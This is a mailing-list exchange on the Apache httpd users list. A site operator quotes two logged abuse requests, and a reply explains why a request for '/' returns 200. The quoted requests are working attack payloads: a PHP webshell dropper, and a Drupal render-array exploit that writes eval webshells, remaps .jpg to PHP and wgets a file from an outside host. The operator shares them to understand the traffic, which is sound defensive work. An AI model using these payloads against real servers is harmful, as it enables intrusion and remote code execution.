The requests processed asked to GET and POST to / in HTTP/1.1 protocol. Why do you suppose your server should reject a request for the content '/'? Seems like a very strange concern.
Depending on the handler charged with processing '/', the remaining '?' query args are interpreted, or generally ignored. On Fri, Apr 5, 2019, 23:15 kohmoto <kohm...@iris.eonet.ne.jp> wrote: > Hi, > > I operate my site with httpd 2.4.39 with ssl option. > > Yesterday, strange responses were observed. > > My site received the following abuse requests. Except the following > requests, the httpd return 404 error to obvious abuse requets. However, > as to the following two queries, the httpd seemed to return a message > when it receives 'GET /' with 200 status. I expect the httpd should > return 404 error. > > Case 1: > GET > /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B > > HTTP/1.1 > > Case 2: > POST > > /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F% > 2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 > HTTP/1.1 > > It would be very appriciated if someone could advise me. > > Thank you. > > Yours truly, > > Kazuhiko Kohmoto > > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: users-unsubscr...@httpd.apache.org > For additional commands, e-mail: users-h...@httpd.apache.org > >
